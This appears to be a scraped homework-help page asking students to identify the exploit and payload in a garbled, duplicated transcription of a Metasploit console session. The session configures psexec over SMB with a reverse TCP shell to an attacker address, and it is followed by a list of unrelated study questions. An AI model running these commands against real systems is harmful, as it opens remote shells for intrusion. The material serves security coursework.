What is the vulnerability and exploit used in this attack? 2- What is the payload
Fantastic news! We've Found the answer you've been seeking!
Question:
Transcribed Image Text:
msf5 > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/psexec) > set RHOST 192.168.100 RHOST 192.168.100 msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.25 LHOST 192.168.1.25 msf5 exploit (windows/smb/psexec) > set LPORT 4444 LPORT 4444 msf5 exploit(windows/smb/psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD windows/shell/reverse_tcp msf5 exploit (windows/smb/psexec) > Payload options (windows/shell/reverse_tcp): Name EXITFUNC thread LHOST LPORT Current Setting Required Desc Exit The The Name 192.168.1.25 4444 msf5 exploit(windows/smb/psexec > show options Module options (exploit/windows/smb/psexec): RHOSTS syntax 'file: ' RPORT SERVICE DESCRIPTION SMBDomain SMBPass SMBUser SERVICE_DISPLAY_NAME yes yes yes Current Setting Required 192.168.100 445 SERVICE_NAME SHARE ADMIN$ or a normal read/write folder share yes yes no no no yes no no no Payload options (windows/shell/reverse_tcp): msf5 > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/psexec) > set RHOST 192.168.100 RHOST 192.168.100 msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.25 LHOST 192.168.1.25 msf5 exploit (windows/smb/psexec) > set LPORT 4444 LPORT 4444 msf5 exploit(windows/smb/psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD windows/shell/reverse_tcp msf5 exploit (windows/smb/psexec) > Payload options (windows/shell/reverse_tcp): Name EXITFUNC thread LHOST LPORT Current Setting Required Desc Exit The The Name 192.168.1.25 4444 msf5 exploit(windows/smb/psexec > show options Module options (exploit/windows/smb/psexec): RHOSTS syntax 'file: ' RPORT SERVICE DESCRIPTION SMBDomain SMBPass SMBUser SERVICE_DISPLAY_NAME yes yes yes Current Setting Required 192.168.100 445 SERVICE_NAME SHARE ADMIN$ or a normal read/write folder share yes yes no no no yes no no no Payload options (windows/shell/reverse_tcp):
Expert Answer:
Related Book For
Introduction to Java Programming, Comprehensive Version
ISBN: 978-0133761313
10th Edition
Authors: Y. Daniel Liang
Posted Date:
Students also viewed these computer network questions
-
Let A, B be sets. Define: (a) the Cartesian product (A B) (b) the set of relations R between A and B (c) the identity relation A on the set A [3 marks] Suppose S, T are relations between A and B, and...
-
can someone solve this Modern workstations typically have memory systems that incorporate two or three levels of caching. Explain why they are designed like this. [4 marks] In order to investigate...
-
Design a Java class that represents a cache with a fixed size. It should support operations like add, retrieve, and remove, and it should evict the least recently used item when it reaches capacity.
-
In each of the homeowners forms, OA) the property coverage is the same OB) the liability coverage varies OC) both the property and liability coverage are the same OD) the property coverage varies
-
Why does commitment and contingencies appear on the balance sheet without an amount?
-
Supply the missing amounts for each of the following companies Requirement 1. Prepare the income statement for Fisher Company, for the year ended December 31, 2010. Use the cost-of-goods-sold model...
-
Consider the air pollution and mortality data given in Table B.15. a. Is there a problem with collinearity? Discuss how you arrived at this decision. b. Perform a ridge trace on these data. c. Select...
-
Segmental Disclosures In the Appendix to this chapter, the partial segmental disclosures for General Electric (GE) are provided. 1. How does GE organize and present its segment data? 2. Compute the...
-
Whirly Corporation's contribution format income statement for the most recent month is shown below: Sales (8,000 units) Variable expenses Contribution margin Fixed expenses Total Per Unit $ 272,000 $...
-
You are part of the engagement team for the audit of Suzuki Manufacturing for the year ended December 31, 2019, and are responsible for auditing the acquisition cycle. Download the Excel file for the...
-
Part A What is the value of the bond angles in CC14? Enter the bond angle of the molecule. degrees Submit Hints My Answers Give Up Review Part Part B What is the value of the smallest bond angle in...
-
The maximum mass that a fully-loaded commercial airplane can have and still take off is 236,100 kg. In order to take off, it must have a speed of 52 m/s. How much kinetic energy does this plane have...
-
A company makes different types of gift baskets. The holiday basket includes 30 different items and requires 4 labor hours to assemble. The corporate basket includes 10 different items and requires 8...
-
A car travels a distance of 450 km in a straight line for 4.50 hours from Hither to Yon. The car then returns to Hither from Yon in a straight line at 90.0 km/h. Answer the following questions based...
-
What role does innovation play in the strategic planning process, and how can organizations cultivate a culture of innovation to drive continuous improvement and competitive advantage in dynamic...
-
Gowri has $6 per day to purchase lunch. She spends all of her lunch money on pizza and iced-tea. The price of pizza is $2.00 per slice and iced-tea costs $1 per bottle. a. Draw Gowri's budget...
-
la. Explain any four laws that regulate the Healthcare industry. 2b. Discuss four implications (one each for the laws explained in 1a) on the financial management of healthcare facilities in Ghana.
-
Research an article from an online source, such as The Economist, Wall Street Journal, Journal of Economic Perspectives, American Journal of Agricultural Economics, or another academic journal. The...
-
In Listing 11.10, MyStack is implemented using composition. Define a new stack class that extends ArrayList.Draw the UML diagram for the classes and then implement MyStack. Write a test program that...
-
Write a program that prompts the user to enter the year and first day of the year and displays the calendar table for the year on the console. For example, if the user entered the year 2013, and 2...
-
Modify MyHashMap to allow duplicate keys for entries. You need to modify the implementation for the put(key, value) method. Also add a new method named getAll(key) that returns a set of values that...
-
There is another possible explanation for purchased goodwill appearing in a sole proprietor's statement of financial position. What do you think it might be?
-
Why do the assets need to be revalued in these cases? The business has not been sold.
-
The shown partners have always shared profits and losses in the ratio: Holt 4; Stott 2: Young 1. From 1 January the assets were to be revalued as the profit sharing ratios are to be altered soon. The...
Study smarter with the SolutionInn App